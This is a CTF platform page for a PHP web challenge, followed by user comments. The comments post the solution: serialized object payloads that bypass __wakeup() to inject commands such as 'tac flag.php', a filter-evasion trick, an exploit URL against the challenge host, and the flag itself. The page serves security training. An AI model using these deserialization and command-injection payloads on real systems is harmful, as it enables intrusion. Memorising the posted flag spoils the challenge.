安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 1724
提  示:
描  述:
flag{}
评论
18956160518 1月前

https://blog.csdn.net/m0_57954651/article/details/127866733

回复 0

EtHat 4月前

O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

xht0525 6月前

nl flag.php|base64

回复 0

不会编程的崽 6月前

<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>

回复 0

不会编程的崽 6月前

O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

c41vin 10月前

0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6

回复 0

wxy1343 10月前

http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}

回复 0

wxy1343 10月前

flag{Unser1alize_and_2CE_Add}

回复 0

yuanyipaceandlove 11月前

class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;

回复 0

15683956189 1年前

特别要注意下url编码的问题

回复 0

WriteUp

image
小赵同学

3 金币

评分(3)

解题动态

OldWolfofFarron 攻破了该题 22小时前
liqliq 攻破了该题 1天前
catdogpeach 攻破了该题 4天前
白牧羊人 攻破了该题 10天前
清风伴我 攻破了该题 10天前
2324281128 攻破了该题 12天前
18713476188jiang 攻破了该题 12天前
asd+1024 攻破了该题 18天前
Daisys 攻破了该题 20天前
lwq522725 攻破了该题 23天前
沈奕 攻破了该题 24天前
18835780752 攻破了该题 24天前
tianxiangfazhan 攻破了该题 29天前
changkong 攻破了该题 29天前
网络小梦 攻破了该题 1月前
Y07 攻破了该题 1月前
xiaoshi 攻破了该题 1月前
1004025151 攻破了该题 1月前
19591587311 攻破了该题 1月前
ivAyMdlo 攻破了该题 1月前